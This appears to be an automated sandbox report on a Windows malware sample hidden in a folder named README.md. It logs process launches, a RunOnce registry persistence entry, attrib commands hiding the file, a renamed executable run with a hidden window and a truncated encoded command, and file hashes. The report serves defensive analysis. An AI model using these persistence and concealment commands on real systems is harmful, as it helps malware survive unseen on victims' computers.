C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\README.md\entry.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat"

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce /f /v particovl /d "C:\Users\Admin\AppData\Roaming\particovl.bat"

C:\Windows\system32\attrib.exe

attrib +s +h C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe

C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe

C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe -wIn 1 -enC …

C:\Windows\system32\attrib.exe

attrib -s -h C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe

MD5 92f44e405db16ac55d97e3bfe3b132fa
SHA1 04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA256 6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512 f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

C:\Users\Admin\AppData\Local\Temp\README.md\inst\particovl.bat.exe

MD5 92f44e405db16ac55d97e3bfe3b132fa
SHA1 04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA256 6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512 f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f

memory/888-96-0x0000000002610000-0x0000000002650000-memory.dmp

memory/888-97-0x0000000002610000-0x0000000002650000-memory.dmp

memory/888-98-0x0000000002610000-0x0000000002650000-memory.dmp